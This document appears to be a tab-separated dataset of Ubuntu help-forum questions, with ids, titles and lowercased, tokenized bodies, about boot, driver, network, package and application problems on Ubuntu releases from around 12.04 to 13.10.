395871	upgrade old ubuntu release to newer one , apt-get sourcelist error	we have more than 100 servers using ubuntu as our os , many of those are old ubuntu release mostely version 10 , which when we do apt-get update it wont work or do-release-upgrade wont work as well , followed many blogs that advice to edit the apt sourcelist and we tried so many times but still we can not apt-get update return the following error err http : //ppa.launchpad.net maverick/main amd64 packages 404 not found or w : failed to fetch any feasible solution for this issue that can prevent us from re-installing from scratch on every single server . thanks
395874	unable to boot ubuntu 13.10 with windows 8 ..	i have dell n5010 laptop with windows 8 . yesterday i installed ubuntu 13.10 on my laptop but i m unable boot with ubuntu . whenever i restart my system it directly goes to windows . there is no option like secure boot or legacy boot in my bios thanks
395875	grub boot instead of any hdd	i was recently installing linux on my hard drive ( sdc ) and it caused problem during grub installation and i try to use boot-repair . but it does n't work now whenever i start my system . it boots in grub instead of any hard drives . i have to select bios boot menu shortcut to boot from hdd , it works properly when i boot into my windows and mac system . i have 3 hard drives . my mac system is on different hard drive and windows and linux was on the same ... . it boot properly when i disabled uefi boot mode from my bios , how can i repair this thing without affecting my windows or mac ? what is the solution for this ? thank you friends .
395878	black screen on boot .	i have successfully installed ubuntu 12.04.3 alongside windows 8.1 in my acer v3 772g . when i restart my computer the grub interface appears and i can boot windows 8.1 successfully , but when i boot ubuntu my screen turns black and nothing happens . my pc has 'nvidia geforce gt 750m ' and 'intel ( r ) hd graphics ' graphics adapters . after installation of ubuntu i also received the message that your `` system is running in low graphics mode '' . after installation of ubuntu i was also asked if experience boot problem then send the following url to boot.repair @ gmail.com , which i already have done : http : //paste.ubuntu.com/6634739 i have also tried to update the drivers , but in vain . can anybody please help me fix this issue ? abdul malik
395879	how to create uefi-only bootable usb live media ?	having live media that can boot both ways can be a problem when installing ubuntu onto currently available windows 8 computers . in other words the key advantage to creating uefi-only bootable usb live media is : you know that it definitely booted and installed via uefi . since valve has already been doing uefi-only booting usb installers with their steam os and unetbootin â the top voted alternative to ubuntu 's startup disk creator â is n't uefi compatible and therefore misleading , i think we should have a separate topic for creating uefi-only bootable usb live media .
395881	black screen with keystroke history	sometimes when ubuntu crashes , i get a black screen where every keystroke i made in the past session is visible . any new keystrokes i make get displayed on the screen too . does ubuntu store the keystrokes in memory for a longer period than required ? where ? if so , can this be disabled ?
395884	ubuntu 13.10 wifi not working - chip id ralink rt3290	i am a new ubuntu user , have upgraded my os from 13.04 to 13.10 yesterday and my wifi stopped working . i have a belkin n300 router , ( previously i was using netgear router with ubuntu 13.04 ) . the wifi works fine on all other devices like windows laptop , android phone but not on ubuntu 13.10 . have gone through all the comments/discussion on the forum but have not resolved my issue . my laptop chip id is ralink rt3290 and pcie it/1b . please help ! ! !
395885	apple magic mouse battery indicator on ubuntu 13.10	does anyone know how to display battery indicator in top panel for apple magic mouse , on desktop computer , when i type in shell 'upower -d ' i get info about device , battery and percentage , also if i go to system- > power i can see wireless mouse and battery level , but i just want simple percentage in top right corner anyway to get this ? thanks
395886	ca n't start gnome-flashback or unity using xvnc + xdmcp	i configured my ubuntu 13.10 using this article on ibm 's website . now i can connect to lightdm , select user and enter password , but de does n't start . i can see the logged-in user using who command . tested with vnc4server , tightvnc and tigervnc . .session-errors : x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 109 ( x_changehosts ) value in failed request : 0x5 serial number of failed request : 6 current serial number in output stream : 8 x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 109 ( x_changehosts ) value in failed request : 0x5 serial number of failed request : 6 current serial number in output stream : 8 сценарий для cjkv запущен из run_im . сценарий для default запущен из run_im .
395894	lubuntu 13.10 - polish letters on uk keyboard	i have netbook with uk keyboard ( âł with 3 , $ with 4 , different placement of @ etc . ) and i would like to have polish letters on this layout ( ctrl+s , ctrl+a , ctrl+e etc. ) . it should be possible as i 've set it up on different laptop with windows 7 . to set it up i need to create custom keyboard layout based on uk keyboard , i just do n't know how to do that .
395896	crash when maximizing thunderbird on 13.10	i 'm using ubuntu 13.10 , i 've installed unity tweak tool . sometimes , when i maximize a window , the system freeze and i ca n't do anything ( the system is still in freeze after 3 hours ) . i have to reboot my pc . the last example was yesterday , when i 've maximized thunderbird by sliding the window to the top of my screen . i do n't know if this is relevant , but i 'm using dual screen . i 've tried to find an error in /var/log/syslog but i did n't find anything ... is there the right place to look ? tell me if i need to add any info , i will be happy to do so ! edit 1 : to find error in syslog , i 've done : less /var/log/syslog.1 | grep error i 've also looked manually trough the last entries ... edit 2 : after playing a bit with multiples softwares , it looks like the crash only appears when using thunderbird ! have you had similar experience with thunderbird ? edit 3 : i should have say it from the beginning , but it only happens when i resize a windows by pulling it on the edge of the screen !
395897	keyboard layout settings in ubuntu 13.10	i 've been using a costumed keyboard layout in previous ubuntu changing the files keypad and kpdl in /usr/share/x11/xkb/symbols . i modified the legacy layout , so i used to choose legacy in numeric keypad layout selection in system settings , but now in ubuntu 13.10 i can not find the similar path . how do change the numeric keypad layout in ubuntu 13.10 ?
395898	error while trying to update packages	yesterday i tried to install skype using the terminal , but i did something wrong because skype did not get installed and today , when i opened the pc , an error message appeared . it seems that while trying to update a package something went wrong . the message that appears says that i should update packages but when i try this appears ( translated to english ) : an irresolvable error has occured while initializing the packages information . inform of thus error to the update-manager and include the following message : 'e : malformed line 60 in the source list /etc/apt/sources.list ( analazing dist ) ' this is a link to the text i get when i issue gedit etc/apt/sources.list http : //pastebin.com/9bdgxz7b when writting : sudo lang=c apt-get update and sudo lang=c apt-get check appears the following : sudo lang=c apt-get update e : malformed line 60 in source list/etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . sudo lang=c apt-get check reading package lists ... done building dependency tree reading state information ... done how to solve this ?
395902	endless / infinite boot with hp mini 2140 and lubuntu 13.10	i am really a linux/ubuntu newbie and ca n't solve this issue . i installed lubuntu 13.10 on my old hp mini 2140 netbook . it 's running windows xp and i gave lubuntu 30 gb of the same hard disk drive . everything is running fine and i even got the wireless broadcom running . unfortunately , the boot process during start-up usually ends up in an infinite cycle . i have been reading tons of posts here and in other forums and tried different grub settings but without success . the lubuntu splash screen is switching back and forth between endless debug messages shown on the screen . if i press various key combinations ( such as alt-ctrl-f8 ) , it sometimes works and i get to the login screen . but this only works in 50 % of the cases , otherwise i have to restart the netbook . if it works , however , lubuntu runs absolutely flawless and , yes , it 's so much better and smoother than windows ! ! ! the boot.log in /var/logs look like this : * starting mdns/dns-sd daemon [ 74g [ ok ] * starting configure network device security [ 74g [ ok ] * starting cups printing spooler/server [ 74g [ ok ] * starting mount network filesystems [ 74g [ ok ] * starting failsafe boot delay [ 74g [ ok ] * stopping mount network filesystems [ 74g [ ok ] * stopping failsafe boot delay [ 74g [ ok ] * starting system v initialisation compatibility [ 74g [ ok ] * starting modem connection manager [ 74g [ ok ] * starting configure network device security [ 74g [ ok ] * starting configure network device [ 74g [ ok ] * starting configure network device security [ 74g [ ok ] * starting network connection manager [ 74g [ ok ] * starting configure network device [ 74g [ ok ] skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting userspace bootsplash [ 74g [ ok ] * starting send an event to indicate plymouth is up [ 74g [ ok ] * starting bridge socket events into upstart [ 74g [ ok ] * starting bridge file events into upstart [ 74g [ ok ] * stopping userspace bootsplash [ 74g [ ok ] * stopping cold plug devices [ 74g [ ok ] * stopping log initial device creation [ 74g [ ok ] * starting configure network device security [ 74g [ ok ] * starting save udev log and update rules [ 74g [ ok ] * stopping save udev log and update rules [ 74g [ ok ] * starting configure virtual network devices [ 74g [ ok ] * starting apparmor profiles [ 128g [ 122g [ ok ] * setting up x socket directories ... [ 128g [ 122g [ ok ] * starting ntp server ntpd [ 128g [ 122g [ ok ] * restoring resolver state ... [ 128g [ 122g [ ok ] * stopping system v initialisation compatibility [ 74g [ ok ] * starting system v runlevel compatibility [ 74g [ ok ] * starting [ 74g [ ok ] * starting automatic crash report generation [ 74g [ ok ] * starting [ 74g [ ok ] * starting acpi daemon [ 74g [ ok ] * starting anac ( h ) ronistic cron [ 74g [ ok ] * starting [ 74g [ ok ] * starting [ 74g [ ok ] * starting save kernel messages [ 74g [ ok ] * starting [ 74g [ ok ] * starting [ 74g [ ok ] * starting initializes zram swaping [ 74g [ ok ] * starting crash report submission daemon [ 74g [ ok ] * starting regular background program processing daemon [ 74g [ ok ] * starting cpu interrupts balancing daemon [ 74g [ ok ] * stopping system v runlevel compatibility [ 74g [ ok ] * stopping save kernel messages [ 74g [ ok ] please let me know , if i need provide any other information such as dmesg , syslog and so on . thanks for your help , it 's highly appreciated . kai
395903	how to use entypo font in kolourpaint	i installed the entypo font http : //www.entypo.com/characters/ but how to use it ? i want to use it in kolourpaint and i do n't find the way to write characters .
395905	how can know to success the sending using gsmsendsms of ubuntu in php	i am using ubuntu server 13.10 lamp . i am using gsm usb modem 8 ports . ttyacm0 - ttyacm7 so , normally , i need to detect a port which is on active ( i.e . working ) or on inactive . then , in php , i can send a message via now inactivating port . by the way , i used the following shell commands : < ? php echo system ( `` gsmsendsms -d /dev/ttyacm7 -b 115200 1545321355 'hello ! ' '' ) ; ? > this is sending code via ttyacm7 ( i.e . 8th port ) . after invoking , there is no any return values . so , i can not know weather send is success or fail . and one more . how can i distinguish which port is on working or not working ?
395906	`` only my wifi '' is not working - ubuntu 12.04	ubuntu 12.04 is not detecting `` only my wi-fi '' , its showing all other nearby . my wifi is working fine on my android , my windows machine ( dual boot on same laptop ) . i 'm goggling this problem since last 3 days . it was working fine after fresh installation , i upgraded all softwares , media drivers , everything . it was working flawlessly . but next day it refused to connect to `` only my wifi '' . i followed some steps on google , but no luck . i reinstalled it , but nothing . its the third time i 'm installing it in last 3 days , but no results . how can i fix this ? details : dell inspiron 1464 . wicd network manager is installed ( i goggled it ) i have wired connectivity but for that i 've to stand for hours , that 's not a solution . more details : ======================================== **u : ~ $ iwconfig lo no wireless extensions . eth2 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . ** ========================================
395909	how to deploy havana with juju	i 've been all over the web searching for an installation guide for openstack havana via juju charms over ubuntu saucy 13.10 which is said to be build specially for havana ; with no luck at all . all i could find is either how to install the ancient openstack essax over precise 12.04 or installing havana over 12.04 directly `` without juju '' . i tried blindly by deploying these charms over 10 maas nodes , and add all the possible relations between then from the gui : juju-gui openstack-dashboard cinder glance keystone nova-cloud-controller quantum-gateway mysql rabbitmq-server nova-compute and all were deployed and started successfully . yet i could n't browse to horizon . i also tried to follow openstack docs of 12.04 , but since all the charms are already pre-configured i founded duplicate configs and keys that made the thing worst . could you please give me any reference or guide me to how to start . thank you .
395910	is there any 64 bit version of skype available ?	i was just trying to install skype on my fresh ubuntu 13.10 64 bit but i have discovered that i would require a lot of my already installed libraries to be installed in 32 bit version just as : $ sudo apt-get install skype reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : gcc-4.8-base : i386 libasound2 : i386 libasound2-plugins : i386 libasyncns0 : i386 libaudio2 : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libc6 : i386 libcomerr2 : i386 libcups2 : i386 libdbus-1-3 : i386 libdbusmenu-qt2 : i386 libdrm-intel1 : i386 libdrm-nouveau2 : i386 libdrm-radeon1 : i386 libdrm2 : i386 libelf1 : i386 libexpat1 : i386 libffi6 : i386 libflac8 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcc1 : i386 libgcrypt11 : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libglapi-mesa : i386 libglib2.0-0 : i386 libgnutls26 : i386 libgpg-error0 : i386 libgssapi-krb5-2 : i386 libgstreamer-plugins-base0.10-0 : i386 libgstreamer0.10-0 : i386 libice6 : i386 libjack-jackd2-0 : i386 libjbig0 : i386 libjpeg-turbo8 : i386 libjpeg8 : i386 libjson-c2 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 liblcms1 : i386 libllvm3.3 : i386 liblzma5 : i386 libmng1 : i386 libmysqlclient18 : i386 libogg0 : i386 liborc-0.4-0 : i386 libp11-kit0 : i386 libpciaccess0 : i386 libpcre3 : i386 libpng12-0 : i386 libpulse0 : i386 libqt4-dbus : i386 libqt4-declarative : i386 libqt4-network : i386 libqt4-opengl : i386 libqt4-script : i386 libqt4-sql : i386 libqt4-sql-mysql : i386 libqt4-xml : i386 libqt4-xmlpatterns : i386 libqtcore4 : i386 libqtgui4 : i386 libqtwebkit4 : i386 libsamplerate0 : i386 libselinux1 : i386 libsm6 : i386 libsndfile1 : i386 libspeexdsp1 : i386 libsqlite3-0 : i386 libssl1.0.0 : i386 libstdc++6 : i386 libtasn1-3 : i386 libtiff5 : i386 libtxc-dxtn-s2tc0 : i386 libuuid1 : i386 libvorbis0a : i386 libvorbisenc2 : i386 libwrap0 : i386 libx11-6 : i386 libx11-xcb1 : i386 libxau6 : i386 libxcb-dri2-0 : i386 libxcb-glx0 : i386 libxcb1 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxext6 : i386 libxfixes3 : i386 libxi6 : i386 libxml2 : i386 libxrender1 : i386 libxslt1.1 : i386 libxss1 : i386 libxt6 : i386 libxv1 : i386 libxxf86vm1 : i386 mysql-common skype-bin : i386 sni-qt : i386 zlib1g : i386 suggested packages : nas : i386 glibc-doc : i386 locales : i386 rng-tools : i386 libglide3 : i386 gnutls-bin : i386 krb5-doc : i386 krb5-user : i386 libvisual-0.4-plugins : i386 gstreamer-codec-install : i386 gnome-codec-install : i386 gstreamer0.10-tools : i386 gstreamer0.10-plugins-base : i386 jackd2 : i386 liblcms-utils : i386 pulseaudio : i386 libqt4-declarative-folderlistmodel : i386 libqt4-declarative-gestures : i386 libqt4-declarative-particles : i386 libqt4-declarative-shaders : i386 qt4-qmlviewer : i386 libqt4-dev : i386 libthai0 : i386 libicu48 : i386 qt4-qtconfig : i386 recommended packages : xml-core : i386 the following new packages will be installed : gcc-4.8-base : i386 libasound2 : i386 libasound2-plugins : i386 libasyncns0 : i386 libaudio2 : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libc6 : i386 libcomerr2 : i386 libcups2 : i386 libdbus-1-3 : i386 libdbusmenu-qt2 : i386 libdrm-intel1 : i386 libdrm-nouveau2 : i386 libdrm-radeon1 : i386 libdrm2 : i386 libelf1 : i386 libexpat1 : i386 libffi6 : i386 libflac8 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcc1 : i386 libgcrypt11 : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : i386 libglapi-mesa : i386 libglib2.0-0 : i386 libgnutls26 : i386 libgpg-error0 : i386 libgssapi-krb5-2 : i386 libgstreamer-plugins-base0.10-0 : i386 libgstreamer0.10-0 : i386 libice6 : i386 libjack-jackd2-0 : i386 libjbig0 : i386 libjpeg-turbo8 : i386 libjpeg8 : i386 libjson-c2 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 liblcms1 : i386 libllvm3.3 : i386 liblzma5 : i386 libmng1 : i386 libmysqlclient18 : i386 libogg0 : i386 liborc-0.4-0 : i386 libp11-kit0 : i386 libpciaccess0 : i386 libpcre3 : i386 libpng12-0 : i386 libpulse0 : i386 libqt4-dbus : i386 libqt4-declarative : i386 libqt4-network : i386 libqt4-opengl : i386 libqt4-script : i386 libqt4-sql : i386 libqt4-sql-mysql : i386 libqt4-xml : i386 libqt4-xmlpatterns : i386 libqtcore4 : i386 libqtgui4 : i386 libqtwebkit4 : i386 libsamplerate0 : i386 libselinux1 : i386 libsm6 : i386 libsndfile1 : i386 libspeexdsp1 : i386 libsqlite3-0 : i386 libssl1.0.0 : i386 libstdc++6 : i386 libtasn1-3 : i386 libtiff5 : i386 libtxc-dxtn-s2tc0 : i386 libuuid1 : i386 libvorbis0a : i386 libvorbisenc2 : i386 libwrap0 : i386 libx11-6 : i386 libx11-xcb1 : i386 libxau6 : i386 libxcb-dri2-0 : i386 libxcb-glx0 : i386 libxcb1 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxext6 : i386 libxfixes3 : i386 libxi6 : i386 libxml2 : i386 libxrender1 : i386 libxslt1.1 : i386 libxss1 : i386 libxt6 : i386 libxv1 : i386 libxxf86vm1 : i386 mysql-common skype skype-bin : i386 sni-qt : i386 zlib1g : i386 0 upgraded , 106 newly installed , 0 to remove and 0 not upgraded . need to get 68,5 mb of archives . after this operation , 223 mb of additional disk space will be used . do you want to continue [ y/n ] ? is there any 64 bit version for 13.10 available to avoid installed all of those libs ?
395911	why does n't nemo preview thumbnails ?	i have a problem with thumbnails on my ubuntu 12.04 lts 32-bit system with cinnamon 2.0.14 de and nemo 2.08 . i have tried removing the ~/.thumbnails directory but it is not working for me . this is very weird because when i open an image in eye of gnome , nemo is creating thumbnails but other images does n't have preview thumbnails as one can see in my screenshots below . i have changed the preview settings as show miniatures always . screenshot 1 : screenshot 2 :
395912	why does qt creator automatically exit randomly after about 5 minutes ?	iâm running ubuntu 13.10 and have upgraded qt4 to qt5 . while using qt creator 2.7 iâm facing two problems at this time . when i run qt it only stays open for about five minutes or so . also when you are in the welcome tab , if you click anything - it opens a new window but the window is see-through ( transparent ) . what is going on with it because it was working just fine ? and , how do i fix these issues ?
395913	dual boot win 8.1 - xubuntu 12.04 problem	i have a asus s56 with preloaded windows 8 and i 've recently upgraded to windows 8.1 . during the installation of xubuntu i 've selected custom partitioning ( something else ) : i 've formatted in ext4 a partition and i 've there the root , i 've selected another empty partition for swap and then i 've put the xubuntu bootloader in the first , cause i 've read that for some reasons it 's better to leave boot operations to windows leaving the system mbr intact , and then to insert an entry in the win boot manager . after installing xubuntu , i 've managed to insert the entry from windows with easybcd : i 've choosen grub2 . restarting the pc the blue screen to select the os appears : if i choose windows it starts perfectly , if i choose xubuntu windows boot manager reports error and does n't boot xubuntu . what can i do ?
395915	how can i make my localhost server be available online ? ( apache , php )	how can i make my localhost server be available online ? ( apache , php ) when i try to enter my ip address into the url bar i get no result .
395918	strange error while reinstalling 12.04	so i 'm trying to install ubuntu 12.04 ( 64-bit ) to an external hdd . i select where i want the swap area , the boot loader , etc ( the `` something else '' option ) . that all works fine , then i click `` install now '' , it then starts formatting my hdd and copying files . great . i then fill out the `` where are you '' window and click continue , i then fill out the `` who are you '' window ( all fields are green , username is all lower case ) . and then i click the `` continue '' button , then the mouse turns into the `` clock '' and the installer continues to copy files . but when it finishes copying ( progress bar is full ) the progress bar then vanishes and nothing happens , the `` who are you '' window is still displayed , the mouse is still the `` clock '' . absolutely nothing changes ( except for the progress bar ) . update i cancelled the installation then restarted the installer , but this time i selected the `` reinstall ubuntu 12.04.3 lst '' ( or something like that ) , it then installs , but now i get a sort-of blue screen error ( but with a black screen instead ) when it starts to install grub 2 . first line of the error ... [ 1276.066187 ] bug : unable to handle kernel paging request at 00000000bd80819c a few lines later ... [ 1276.068391 ] call trace [ 1276.068391 ] [ < ffffffff81054bd6 > ] ? efi_call4+0x46/0x80 there 's then a few more lines of the call trace , but i only copied the last call . this looks like a bug to me , but if it 's not , what can i do to fix this problem ?
395920	the old wireless problem	i am suffering from the same old wireless problem . i tried everything i could find on the net as well as ubuntu forums , but nothing works . how can i fix this ? ? my device information from lshw -c network : ***product : bcm4311 802.11a/b/g vendor : broadcom corporation configuration : driver=wl latency=0*** to me , what i was able to learn from the net , the driver is just the right one . but still it is n't working . iwconfig shows : **lo no wireless extensions . eth0 no wireless extensions . ** what other information do you need ?
395922	ubuntu remote desktop	i want to remote control my ubuntu from another ubuntu . i need to have audio support and fast connection with the ability of issuing shortcut keys and clipboard copy and language switching . what i heard about : vnc vnc + ssh tunnelling nx server , free edition freenx neatx x2go x11 forwarding over ssh xrdp x11rdp ltsp x11vnc what i have tried so far : vnc ( slow ) vnc + ssh tunnelling ( same as above ) nx server , free edition freenx ( limitations -3 users - resolution ... ) neatx x2go x11 forwarding over ssh xrdp ( audio support - complex deployment ) x11rdp ( audio support - complex deployment ) ltsp x11vnc ( audio support - complex deployment ) the following question does not answer my needs because it only talked about freenx and a little bit about xrdp i ask for someone tried other protocols above and had a decent experience with it . i hope you can help me . note : ubuntu may be going to remove xorg implementation in the next release ( 14.04 lts ) so we do not have the option of x server forwarding . by the way i am developing android applications and the emulator of android can not run in xrdp . i can only start it with vnc . so i suffer from switching from xrdp to vnc all the day .
395923	how do i deploy the openstack bundle to one machine ?	is it possible to deploy the openstack bundle to one machine with the cli ? is it possible to edit the example.yaml bundle with -- to machine ? if yes , how ?
395926	brother dcp-7055w	my brother dcp 7055w does not scan . i can print ok , but the scanner wo n't work . i am running ubuntu 13.10 32- bit on amd athlon ( tm ) 64 x2 dual core processor 4200+ ă 2 . in the previous version of ubuntu and with another printer/scanner simple scan and printing was working fine . now after the update - i can print-ok . but when i try printing 2 pages on one page , it shows it corrrectly in the preview but as a print the pages come out in the portrait form with one and a half page print in landscape on it . from http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_prn.html # dcp-153c , i have installed the cupswrapper driver and lpr driver . how can i fix it so that when i want to print two pages on one , it does what i want it to do ? ? ? now with the scanner i have installed from the http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_scn.html the scan-key-tool 32bit and the brscan 32-bit . i have tried uninstalling , then re-installing , xsane and simple scan ( through synaptic ) , but it still wont work . for some reason in synaptic package manager , the only entries under brother are the lpr , cupswapper , & brscan-skey files , the br scan file is not listed . simple scan reports `` failed to scan . unable to start scan , & xsane reports `` failed to start scanner : invalid argument . with the windows laptop , it is perfectly printing , scanning and even scanning over wireless . i have tried numerous times to get the scanner running , and printer to print properly the two pages on one , but to no avail . argghhhh ... ... i hate to have to start the windows laptop scan and then transfer to the ubuntu desktop . any help will be sincerely appreciated . many thanks . vsb
395931	how can i find and edit the php.ini file ?	i am trying to find the php.ini file on ubuntu server with the command : sudo vim /etc/php5 however , this tells me that the file does not exist . how can i find and edit the php.ini file ?
395932	can i install ubuntu in a 3.5 gb mini pc	i have a mini pc which only have 3.5gb disk space . and i really wish to install linux ubuntu in top of it . any recommendation ?
395936	my laptop freeze when my laptop is not plugged into the ac power	when i plug the power cable my laptop works great . but when the power cable is not plugged my laptop freeze everytime . i think it 's the power manager but i do n't know how to fix it . please help me . regards davide .
395937	ubuntu 13.10 : broadcom 43142 not finding bluetooth devices	i have a lenovo b590 laptop . the laptop is ubuntu-certified for ubuntu 12.04 64bit , so i was n't expecting any problems . first i tried to get the broadcom 43142 wifi/bluetooth module working on ubuntu 12.10 64bit but failed . therefore i made a fresh ubuntu 13.10 64bit installation yesterday . here the wifi module was recognized out of the box . the only thing i had to do was to enable the restricted driver . the bluetooth module is recognized too , but it does n't work . the problem is : i have two further bluetooth devices placed closely to the laptop , non-paired and each being able to discover the other respectively . none of them is able to disover the laptop , nor does hcitool scan find any devices . it does not give any errors though . lspci|grep -i broadcom : 02:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) 1 dmesg|grep -i blue : [ 8.023496 ] thinkpad_acpi : rfkill switch tpacpi_bluetooth_sw : radio is unblocked [ 8.384905 ] bluetooth : core ver 2.16 [ 8.384936 ] bluetooth : hci device and connection manager initialized [ 8.384943 ] bluetooth : hci socket layer initialized [ 8.384944 ] bluetooth : l2cap socket layer initialized [ 8.384959 ] bluetooth : sco socket layer initialized [ 8.721266 ] bluetooth : ca n't load firmware , may not work correctly [ 11.274285 ] bluetooth : rfcomm tty layer initialized [ 11.274298 ] bluetooth : rfcomm socket layer initialized [ 11.274299 ] bluetooth : rfcomm ver 1.11 [ 11.283683 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 11.283686 ] bluetooth : bnep filters : protocol multicast [ 11.283696 ] bluetooth : bnep socket layer initialized [ 13.417478 ] bluetooth : hci0 command 0x1003 tx timeout hciconfig : hci0 : type : br/edr bus : usb bd address : 1c:3e:84 : e8:81:98 acl mtu : 1021:8 sco mtu : 64:1 up running pscan iscan rx bytes:1265 acl:0 sco:0 events:84 errors:0 tx bytes:3794 acl:0 sco:0 commands:81 errors:0 bluez-simple-agent hci # 1c:3e:84 : e8:81:98 : creating device failed : org.bluez.error.connectionattemptfailed : page timeout rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 2 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no uname -a : linux b590 3.11.0-14-generic # 21-ubuntu smp tue nov 12 17:04:55 utc 2013 x86_64 x86_64 x86_64 gnu/linux and finally here 's the output of the scan attempt , which does not give any results : hcitool scan : scanning ... what have i missed ? how am i supposed to get the bluetooth device working ?
395938	how can i change gnome terminal font in command line ?	i know how to change gnome 's terminal font using the gui but i would like to do the same using the terminal ( automated way ) . how can i do that ?
395941	installation of ubuntu 12.04 on nuc d54250wyk	i tried to install ubuntu 12.04 on a intel nuc d54250wyk . install went well , but after the reboot , i have the following message from the intel boot agent : media test failure , check cable exiting intel boot agent reboot and select proper boot device or insert boot media in selected boot device went to setup , selected the ssd as primary boot device , but same result . is there a complete guide to install ubuntu on a nuc haswell ? any help would be appreciated !
395942	node.js nvm causes xubuntu login loop with ~/.profile line	there are various posts on the xubuntu login loop , but none of them address nvm ( node version manager ) . i have installed nodejs via nvm on my xubuntu vm and it works fine , however after rebooting , i ca n't log into xfce anymore . xubuntu is in a login loop . the line responsible is in ~/.profile , added by nvm : [ -s $ home/.nvm/nvm.sh ] & & . $ home/.nvm/nvm.sh # this loads nvm if i comment the line out , i can log in again . i do n't know exactly what the problem is . i suppose this line is failing somehow . how could i troubleshoot this ? are there any logs that i could look at ? if i log in through the terminal and run source ~./profile there are no errors and nvm is loaded correctly .
395944	pressing back space inputs characters	so recently i just installed ubuntu 13.04 , and i have serious problems with skype . so first of all and that worries me most is that after some time i ca n't write in chats . for example , if i 'm pressing `` backspace '' in skype chat it behaves strange . with every click it starts to write different symbols - like , if i press backspace , it will write `` p '' , second press will write `` m '' and etc and everytime its in some sort of pattern , like , pressing 12 times backspace it will do something like this `` pmgh m pmgh m '' . and it 's exactly the same with every symbol on keyboard . after that , i can only do a skype restart and everything then is normal for some time , then it will start all over ( but every symbol will have a different patterns ) . if this would be windows i would definitely think i have some sort of virus or some sort of script that changes symbols ( because it 's in patterns ) , i have no idea whats happening here . but , the thing is , i have been running ubuntu for a 3-4 days , and nothing is affected with this behavior , just skype . could someone try to elaborate whats happening ? second thing is after some time skype starts to have a strange crackling sound - and again , to solve this i can only do restart . maybe someone knows whats going on ?
395945	set new keyboard shortcuts for switching between desktop activities	is there a way to set hotkeys for desktop activities in kde plasma : meta/win+tab is good when there are only two activities ; for more , i need a few more hotkeys . is there a way to set new hotkeys for switching between activities .
395946	black screen trying to install ubuntu 13.10 alongside windows	i have fujitsu ah532 laptop with windows 8 on it , i tried installing the ubuntu 13.10 on it , i make it to the try ubuntu or install ubuntu page easily , ( live mode works fine ) when i click on the installing and install ubuntu inside windows 8 , the screen goes black saying all processes are terminated and then shutsdown when i press enter . i have tried installing from flash drive and from dvd . thanks for your help : )
395951	installing ubuntu on to a pc without an os with a usb stick	im trying to install ubuntu onto a pc i have built that does not currently have an os on it , i have followed the ubuntu instructions to make my usb bootable . in my bios i have the option to boot from four different usb-zip usb-hdd usb-fdd and usb-cdrom i have tried all but to no avail when i load up my pc without going to the bios it comes up with basic info about the flash drive and a bunch of stuff below , then below this it shows the drives it has tried to boot from and always comes up with boot error . i need some help .
395954	installing fglrx driver ubuntu	i am installing the fglrx driver , as described in https : //help.ubuntu.com/community/binarydriverhowto/ati . the problem is now that when i type the command `` aticonfig -- initial '' , i get the following `` aticonfig : no supported adapters detected '' , and then x is not loaded in ubuntu . my gpu is amd radeon hd 7600m series .
395955	how to run greeter/login script with lightdm	is there a workaround to run a lightdm script ? the one in the docs does n't work . anything placed there will prevent x from working . the script i would like to use is my kvm utility synergy . i thought for a while it was synergy that was causing the problems . however , i found that anytime there is a lightdm.conf file with anything on that line x will fail to load . example : greeter-setup-script=/etc/lightdm/test.sh the text.sh file is simply a shell command to indicate it ran : test.sh : # ! /bin/bash date > > /tmp/test.log thanks in advance for anyone who has any input , or as i mentioned a workaround so that i could have a resource that will run upon x startup before the user actually logs in .
395966	issues on 12.04.3 on asus notebook with geforce 710m	i have 12.04.3 installed on an asus x552cl notebook which has geforce 710m ( optimus ) . i have 2 issues : wireless gets disabled from hardware switch , i resolved it using echo `` options asus_nb_wmi wapf=1 '' > /etc/modprobe.d/asus.conf nouveau unknow fermi chipset , i solved by installing bumblebee my questions are : are those 2 issues which i described above solved in some updates or patches for 12.04.3 ? because i 'm having my 12.04.3 up-to-date did n't solve them . can i get rid of nouveau driver ? i heard it 's buggy . i 've read a post of some guy on a forum that removed nouveau and installed the intel integrated video chipset drivers and after that he installed the nvidia drivers and bumblebee .
395968	dropbox on livecd ( persistent )	on a 'persistent ' live-usb , the dropbox installation 'forgets ' email & password , and reinstalls at every reboot . ( the command line client also suffers from the same problem ) does anyone know a solution ?
395972	right click on a dell touchpad	previously i have searched thru many answers and still am unable to use the right click dell inspiron 1564 64 bit dell touchpad w/ alp drivers ver.7.102.101.303 previously using win7 now ubuntu 12.04 problem : since installing ubuntu , i have no functionality in the `` right keyclick '' on the dell touchpad . left click is functional as is the mouse pad pointer . i have tried several fixes found here and elsewhere but thus far nothing has solved this problem . is there a compilation of fixes somewhere or has someone reading this had the same problem on same hardware and found a solution . thanks in advance for reading and suggesting paul r
